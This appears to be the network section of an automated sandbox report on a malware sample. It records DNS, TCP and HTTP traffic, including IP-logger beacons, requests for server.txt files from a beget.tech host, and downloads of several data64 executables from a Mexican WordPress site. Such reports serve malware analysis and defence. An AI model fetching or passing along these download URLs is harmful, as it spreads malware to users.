Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
iplogger.com | 148.251.234.93 | |
dzen.ru | 62.217.160.2 | |
tokoi45.beget.tech | 5.101.152.100 | |
yandex.ru | 77.88.55.60 | |
sso.passport.yandex.ru | CNAME passport.yandex.ru; 213.180.204.24 | |
formacioncontinua.com.mx | 66.225.201.117 | |
TCP Requests
Source | Destination | Host |
---|---|---|
192.168.56.103:49185 | 148.251.234.93:443 | iplogger.com |
192.168.56.103:49186 | 148.251.234.93:443 | iplogger.com |
192.168.56.103:49187 | 148.251.234.93:443 | iplogger.com |
192.168.56.103:49184 | 168.119.239.218:36938 | |
192.168.56.103:49181 | 213.180.204.24:443 | sso.passport.yandex.ru |
192.168.56.103:49165 | 5.101.152.100:80 | tokoi45.beget.tech |
192.168.56.103:49166 | 5.101.152.100:80 | tokoi45.beget.tech |
192.168.56.103:49167 | 5.101.152.100:80 | tokoi45.beget.tech |
192.168.56.103:49180 | 62.217.160.2:443 | dzen.ru |
192.168.56.103:49169 | 66.225.201.117:80 | formacioncontinua.com.mx |
192.168.56.103:49170 | 66.225.201.117:80 | formacioncontinua.com.mx |
192.168.56.103:49171 | 66.225.201.117:80 | formacioncontinua.com.mx |
192.168.56.103:49173 | 66.225.201.117:80 | formacioncontinua.com.mx |
192.168.56.103:49175 | 66.225.201.117:80 | formacioncontinua.com.mx |
192.168.56.103:49176 | 66.225.201.117:80 | formacioncontinua.com.mx |
192.168.56.103:49178 | 66.225.201.117:80 | formacioncontinua.com.mx |
192.168.56.103:49177 | 77.88.55.88:443 | yandex.ru |
UDP Requests
Source | Destination |
---|---|
192.168.56.103:50800 | 164.124.101.2:53 |
192.168.56.103:52760 | 164.124.101.2:53 |
192.168.56.103:53673 | 164.124.101.2:53 |
192.168.56.103:56613 | 164.124.101.2:53 |
192.168.56.103:62576 | 164.124.101.2:53 |
192.168.56.103:64894 | 164.124.101.2:53 |
192.168.56.103:137 | 192.168.56.101:137 |
192.168.56.103:137 | 192.168.56.255:137 |
192.168.56.103:138 | 192.168.56.255:138 |
192.168.56.103:49154 | 239.255.255.250:1900 |
8.8.8.8:53 | 192.168.56.103:56613 |
HTTP Requests
GET 302 https://yandex.ru/
REQUEST
GET / HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: yandex.ru
Connection: Keep-Alive
RESPONSE
HTTP/1.1 302 Moved temporarily
Accept-CH: Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA, Sec-CH-UA-Full-Version-List, Sec-CH-UA-WoW64, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Platform, Sec-CH-UA-Full-Version, Viewport-Width, DPR, Device-Memory, RTT, Downlink, ECT
Cache-Control: max-age=1209600,private
Date: Thu, 29 Jun 2023 08:04:07 GMT
Location: https://dzen.ru/?yredirect=true
NEL: {"report_to": "network-errors", "max_age": 100, "success_fraction": 0.001, "failure_fraction": 0.1}
P3P: policyref="/w3c/p3p.xml", CP="NON DSP ADM DEV PSD IVDo OUR IND STP PHY PRE NAV UNI"
Portal: Home
Report-To: { "group": "network-errors", "max_age": 100, "endpoints": [{"url": "https://dr.yandex.net/nel", "priority": 1}, {"url": "https://dr2.yandex.net/nel", "priority": 2}]}
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Robots-Tag: unavailable_after: 12 Sep 2022 00:00:00 PST
X-Yandex-Req-Id: 1688025847374334-13398777157766195603-balancer-l7leveler-kubr-yp-sas-44-BAL-4185
set-cookie: is_gdpr=0; Path=/; Domain=.yandex.ru; Expires=Sat, 28 Jun 2025 08:04:07 GMT
set-cookie: is_gdpr_b=CPzMERDzvwEoAg==; Path=/; Domain=.yandex.ru; Expires=Sat, 28 Jun 2025 08:04:07 GMT
set-cookie: _yasc=bn7Fqa8wM9j/S4i19HIEoHYa91kk9uSjyRTaRDobVz5NdrjX8VoPCaf0RpGJ9A==; domain=.yandex.ru; path=/; expires=Sun, 26 Jun 2033 08:04:07 GMT; secure
set-cookie: i=wlVlX96HHaKBSC4+Co1/Q7kYFSjO5kcPOfltSy/b1hYgp9xPDWMg8+ilKjydKMmKkk0ejVOlLdOMb+vcH1Z3LxJytw4=; Expires=Sat, 28-Jun-2025 08:04:07 GMT; Domain=.yandex.ru; Path=/; Secure; HttpOnly
set-cookie: yandexuid=3661956031688025847; Expires=Sat, 28-Jun-2025 08:04:07 GMT; Domain=.yandex.ru; Path=/; Secure
GET 302 https://dzen.ru/?yredirect=true
REQUEST
GET /?yredirect=true HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: dzen.ru
Connection: Keep-Alive
RESPONSE
HTTP/1.1 302 Found
Content-Length: 0
Content-Type: application/json;charset=utf-8
Date: Thu, 29 Jun 2023 08:04:08 GMT
Location: https://sso.passport.yandex.ru/push?uuid=85d50709-205d-41dd-abfd-712b81bf467c&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue
Set-Cookie: zen_sso_checked=1; Path=/; Domain=.dzen.ru; Expires=Thu, 29-Jun-2023 20:04:08 GMT; Max-Age=43200; Secure; HttpOnly
Set-Cookie: _yasc=gDfpt25vO3AdxivbQ5uANjTl0I67zPEqyWMTw/1m10SMUtpy0xxu6SVm+V4=; domain=.dzen.ru; path=/; expires=Sun, 26 Jun 2033 08:04:08 GMT; secure
GET 200 https://sso.passport.yandex.ru/push?uuid=85d50709-205d-41dd-abfd-712b81bf467c&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue
REQUEST
GET /push?uuid=85d50709-205d-41dd-abfd-712b81bf467c&retpath=https%3A%2F%2Fdzen.ru%2F%3Fyredirect%3Dtrue HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Host: sso.passport.yandex.ru
Connection: Keep-Alive
RESPONSE
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 29 Jun 2023 08:04:10 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1958
Connection: close
Vary: Accept-Encoding
X-Download-Options: noopen
X-Content-Type-Options: nosniff
Surrogate-Control: no-store
Cache-Control: no-store, no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Expires: 0
X-DNS-Prefetch-Control: off
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'none'; frame-ancestors https://*.dzen.ru https://dzen.ru; connect-src 'self'; script-src 'nonce-f6ef977210c4e1d88cad560c2fe76381' 'self'; img-src 'self'
Set-Cookie: mda2_beacon=1688025850311; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/
Set-Cookie: ys=c_chck.2675476113; Domain=.yandex.ru; Secure; Path=/
Set-Cookie: i=cJ5uLZk6uGvklsPZIGsPvVfEhOelZ7NrNP4VhFiad6x3dgzuTd4OHMThBv3ldFSe/kkksjMfZliuSGm04yIAFGD1/TM=; Domain=.yandex.ru; Expires=Sun, 26 Jun 2033 08:04:10 GMT; Secure; HttpOnly; Path=/
Set-Cookie: yandexuid=5998176971688025850; Domain=.yandex.ru; Expires=Sun, 26 Jun 2033 08:04:10 GMT; Secure; Path=/
Set-Cookie: mda2_domains=dzen.ru; Domain=.passport.yandex.ru; Expires=Tue, 19 Jan 2038 03:14:07 GMT; Secure; Path=/
Referrer-Policy: origin
ETag: W/"7a6-fVeTrEk+gtd2z5kQ4A40FWYPjKo"
Strict-Transport-Security: max-age=315360000; includeSubDomains
GET 200 http://tokoi45.beget.tech/server.txt
REQUEST
GET /server.txt HTTP/1.0
Host: tokoi45.beget.tech
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Thu, 29 Jun 2023 08:03:56 GMT
Content-Type: text/plain
Content-Length: 24
Last-Modified: Wed, 28 Jun 2023 15:14:39 GMT
Connection: close
ETag: "649c4e5f-18"
Expires: Thu, 06 Jul 2023 08:03:56 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes
GET 200 http://tokoi45.beget.tech/server1.txt
REQUEST
GET /server1.txt HTTP/1.0
Host: tokoi45.beget.tech
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Thu, 29 Jun 2023 08:03:57 GMT
Content-Type: text/plain
Content-Length: 0
Last-Modified: Mon, 12 Jun 2023 05:54:23 GMT
Connection: close
ETag: "6486b30f-0"
Expires: Thu, 06 Jul 2023 08:03:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes
GET 200 http://tokoi45.beget.tech/server2.txt
REQUEST
GET /server2.txt HTTP/1.0
Host: tokoi45.beget.tech
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.1 200 OK
Server: nginx-reuseport/1.21.1
Date: Thu, 29 Jun 2023 08:03:57 GMT
Content-Type: text/plain
Content-Length: 0
Last-Modified: Mon, 29 May 2023 17:28:07 GMT
Connection: close
ETag: "6474e0a7-0"
Expires: Thu, 06 Jul 2023 08:03:57 GMT
Cache-Control: max-age=604800
Accept-Ranges: bytes
GET 301 http://formacioncontinua.com.mx/2/data64_1.exe
REQUEST
GET /2/data64_1.exe HTTP/1.0
Host: formacioncontinua.com.mx
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.0 301 Moved Permanently
Connection: close
content-type: text/html; charset=UTF-8
expires: Thu, 29 Jun 2023 09:03:59 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://formacioncontinua.com.mx/2/data64_1.exe
content-length: 0
date: Thu, 29 Jun 2023 08:03:59 GMT
GET 200 http://formacioncontinua.com.mx/2/data64_2.exe
REQUEST
GET /2/data64_2.exe HTTP/1.0
Host: formacioncontinua.com.mx
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.0 200 OK
Connection: close
content-type: application/x-msdownload
last-modified: Wed, 28 Jun 2023 15:10:09 GMT
accept-ranges: bytes
content-length: 1539952
date: Thu, 29 Jun 2023 08:03:59 GMT
GET 200 http://formacioncontinua.com.mx/2/data64_3.exe
REQUEST
GET /2/data64_3.exe HTTP/1.0
Host: formacioncontinua.com.mx
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.0 200 OK
Connection: close
content-type: application/x-msdownload
last-modified: Wed, 28 Jun 2023 15:10:38 GMT
accept-ranges: bytes
content-length: 3010560
date: Thu, 29 Jun 2023 08:04:01 GMT
GET 301 http://formacioncontinua.com.mx/2/data64_4.exe
REQUEST
GET /2/data64_4.exe HTTP/1.0
Host: formacioncontinua.com.mx
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.0 301 Moved Permanently
Connection: close
content-type: text/html; charset=UTF-8
expires: Thu, 29 Jun 2023 09:04:04 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://formacioncontinua.com.mx/2/data64_4.exe
content-length: 0
date: Thu, 29 Jun 2023 08:04:04 GMT
GET 301 http://formacioncontinua.com.mx/2/data64_5.exe
REQUEST
GET /2/data64_5.exe HTTP/1.0
Host: formacioncontinua.com.mx
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.0 301 Moved Permanently
Connection: close
content-type: text/html; charset=UTF-8
expires: Thu, 29 Jun 2023 09:04:05 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://formacioncontinua.com.mx/2/data64_5.exe
content-length: 0
date: Thu, 29 Jun 2023 08:04:05 GMT
GET 301 http://formacioncontinua.com.mx/2/data64_6.exe
REQUEST
GET /2/data64_6.exe HTTP/1.0
Host: formacioncontinua.com.mx
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.0 301 Moved Permanently
Connection: close
content-type: text/html; charset=UTF-8
expires: Thu, 29 Jun 2023 09:04:06 GMT
cache-control: max-age=3600
x-redirect-by: WordPress
location: https://formacioncontinua.com.mx/2/data64_6.exe
content-length: 0
date: Thu, 29 Jun 2023 08:04:06 GMT
GET 200 http://formacioncontinua.com.mx/webArg2.txt
REQUEST
GET /webArg2.txt HTTP/1.0
Host: formacioncontinua.com.mx
*Accept: */*
*Connection: close
User-Agent: Firefox-6.0
RESPONSE
HTTP/1.0 200 OK
Connection: close
content-type: text/plain
last-modified: Tue, 20 Jun 2023 15:40:06 GMT
accept-ranges: bytes
content-length: 27
date: Thu, 29 Jun 2023 08:04:06 GMT
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 | |
IRC traffic
No IRC requests performed.
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.103:49177 77.88.55.88:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign ECC OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=*.xn--d1acpjx3f.xn--p1ai | e4:ba:b2:7f:bf:93:b8:22:10:26:70:37:9c:03:1a:9d:fb:23:17:24 |
TLSv1 192.168.56.103:49180 62.217.160.2:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=VK LLC, CN=*.dzen.ru | 6a:31:14:29:60:07:c9:c6:17:7b:d1:27:ad:53:57:ec:d8:c1:d8:d2 |
TLSv1 192.168.56.103:49181 213.180.204.24:443 | C=BE, O=GlobalSign nv-sa, CN=GlobalSign RSA OV SSL CA 2018 | C=RU, ST=Moscow, L=Moscow, O=Yandex LLC, CN=sso.passport.yandex.ru | f0:52:26:54:41:65:2b:6a:37:7b:c1:5b:de:9c:e9:d4:41:c6:81:2d |
Snort Alerts
No Snort Alerts